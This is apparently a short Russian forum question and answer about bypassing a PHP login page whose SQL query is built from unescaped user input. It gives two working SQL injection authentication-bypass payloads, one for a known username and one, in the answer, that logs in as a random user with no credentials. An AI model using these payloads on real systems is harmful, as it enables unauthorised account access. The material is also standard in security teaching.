У меня есть часть очень простого кода страницы входа в систему, написанного на php, который я хочу обойти без какой-либо регистрации.
$req="select id from USERS where login='$login' and pwd='$pass'";
$result = mysql_query($req);
Если у меня есть логин пользователя, например, login1, который уже находится в базе данных. Мне просто нужно ввести следующие записи, чтобы войти без знания его пароля; что мы называем SQL-инъекцией:
login="login1"password="' OR '1'='1'"
Тем не менее, я не знаю, как мы можем войти на страницу без логина или пароля.
Заранее спасибо !
Работает с login="' OR true ORDER BY RAND() LIMIT 1 /*"
Других решений пока нет …